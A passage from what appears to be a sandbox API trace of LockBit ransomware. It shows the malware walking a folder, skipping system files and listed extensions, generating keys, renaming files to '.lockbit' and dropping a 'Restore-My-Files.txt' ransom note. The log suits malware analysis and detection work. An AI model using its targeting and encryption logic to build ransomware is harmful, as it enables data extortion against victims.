lpString2=".WMF") returned -1 [0167.544] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.544] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.544] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.544] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.544] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.544] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.544] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.544] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.544] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.544] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.544] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.544] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.544] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.544] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.544] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.544] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.544] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.544] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.544] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE02287_.WMF") returned 1 [0167.544] lstrcmpiW (lpString1="ntldr", lpString2="PE02287_.WMF") returned -1 [0167.545] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE02287_.WMF") returned -1 [0167.545] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE02287_.WMF") returned -1 [0167.545] lstrcmpiW (lpString1="autorun.inf", lpString2="PE02287_.WMF") returned -1 [0167.545] lstrcmpiW (lpString1="thumbs.db", lpString2="PE02287_.WMF") returned 1 [0167.545] lstrcmpiW (lpString1="iconcache.db", lpString2="PE02287_.WMF") returned -1 [0167.545] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.545] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02287_.WMF") returned=".WMF" [0167.545] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.545] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.545] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.545] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.545] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.545] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.545] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.545] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.545] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.545] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.545] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.545] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.545] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.545] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.546] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.546] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.546] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.546] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.546] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.546] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.546] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.546] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.546] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.546] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.546] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.546] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.546] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.546] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.546] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02287_.WMF.lockbit") returned 72 [0167.546] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02287_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02287_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0167.552] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.552] malloc (_Size=0x40068) returned 0x3d70450 [0167.552] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=17796) returned 1 [0167.552] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.553] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.553] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0167.553] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.553] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.553] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0167.553] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0167.556] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02287_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02287_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.556] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.556] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.558] free (_Block=0x1fa2ed8) [0167.558] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02287_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.558] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.559] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.559] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f0c000, ftCreationTime.dwHighDateTime=0x1bf323f, ftLastAccessTime.dwLowDateTime=0x59cdb0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb7f0c000, ftLastWriteTime.dwHighDateTime=0x1bf323f, nFileSizeHigh=0x0, nFileSizeLow=0x76e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE02288_.WMF", cAlternateFileName="")) returned 1 [0167.559] lstrcmpiW (lpString1=".", lpString2="PE02288_.WMF") returned -1 [0167.559] lstrcmpiW (lpString1="..", lpString2="PE02288_.WMF") returned -1 [0167.559] PathFindExtensionW (pszPath="PE02288_.WMF") returned=".WMF" [0167.559] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.559] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.559] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.559] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.559] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.559] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.559] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.559] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.559] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.559] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.559] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.559] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.560] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.560] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.560] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.560] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.560] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.560] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.560] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.560] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.560] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.560] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.560] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.560] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.560] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.560] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.560] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.560] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.560] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.560] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.560] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.560] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.561] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.561] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.561] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.561] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.561] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.561] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.561] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.561] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.561] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.561] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.561] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.561] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.561] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.561] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.561] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.561] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE02288_.WMF") returned 1 [0167.561] lstrcmpiW (lpString1="ntldr", lpString2="PE02288_.WMF") returned -1 [0167.561] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE02288_.WMF") returned -1 [0167.561] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE02288_.WMF") returned -1 [0167.562] lstrcmpiW (lpString1="autorun.inf", lpString2="PE02288_.WMF") returned -1 [0167.562] lstrcmpiW (lpString1="thumbs.db", lpString2="PE02288_.WMF") returned 1 [0167.562] lstrcmpiW (lpString1="iconcache.db", lpString2="PE02288_.WMF") returned -1 [0167.562] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.562] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02288_.WMF") returned=".WMF" [0167.562] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.562] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.562] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.562] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.562] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.562] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.562] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.562] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.562] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.562] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.562] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.562] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.562] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.563] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.563] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.563] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.563] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.563] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.563] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.563] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.563] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.563] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.563] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.563] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.563] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.563] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.563] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.563] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.563] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02288_.WMF.lockbit") returned 72 [0167.563] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02288_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02288_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0167.565] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.565] malloc (_Size=0x40068) returned 0x3e70008 [0167.565] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=30432) returned 1 [0167.565] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.565] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.565] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0167.565] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.566] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.566] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0167.566] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0167.571] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02288_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02288_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.571] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.571] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.579] free (_Block=0x1fa2ed8) [0167.579] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02288_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.580] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.580] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.580] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f0c000, ftCreationTime.dwHighDateTime=0x1bf323f, ftLastAccessTime.dwLowDateTime=0x59cdb0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb7f0c000, ftLastWriteTime.dwHighDateTime=0x1bf323f, nFileSizeHigh=0x0, nFileSizeLow=0x5850, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE02293_.WMF", cAlternateFileName="")) returned 1 [0167.580] lstrcmpiW (lpString1=".", lpString2="PE02293_.WMF") returned -1 [0167.580] lstrcmpiW (lpString1="..", lpString2="PE02293_.WMF") returned -1 [0167.580] PathFindExtensionW (pszPath="PE02293_.WMF") returned=".WMF" [0167.580] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.580] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.580] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.580] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.580] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.580] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.580] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.580] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.580] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.580] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.580] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.580] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.580] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.580] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.581] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.581] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.581] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.581] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.581] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.581] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.581] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.581] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.581] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.581] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.581] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.581] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.581] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.581] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.592] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.592] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.592] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.592] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.592] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.592] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.592] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.592] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.592] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.592] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.592] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.592] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.592] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.593] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.593] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.593] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.593] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.593] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.593] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.593] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE02293_.WMF") returned 1 [0167.593] lstrcmpiW (lpString1="ntldr", lpString2="PE02293_.WMF") returned -1 [0167.593] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE02293_.WMF") returned -1 [0167.593] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE02293_.WMF") returned -1 [0167.593] lstrcmpiW (lpString1="autorun.inf", lpString2="PE02293_.WMF") returned -1 [0167.593] lstrcmpiW (lpString1="thumbs.db", lpString2="PE02293_.WMF") returned 1 [0167.593] lstrcmpiW (lpString1="iconcache.db", lpString2="PE02293_.WMF") returned -1 [0167.593] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.593] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02293_.WMF") returned=".WMF" [0167.593] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.593] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.593] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.593] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.593] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.593] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.594] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.594] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.594] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.594] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.594] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.594] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.594] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.594] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.594] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.594] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.594] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.594] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.594] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.594] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.594] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.594] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.594] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.594] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.594] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.594] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.594] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.594] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.594] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02293_.WMF.lockbit") returned 72 [0167.594] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02293_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02293_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0167.596] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.596] malloc (_Size=0x40068) returned 0x3df0008 [0167.596] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=22608) returned 1 [0167.596] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.597] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.597] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.597] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.597] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.597] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.597] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.599] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02293_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft 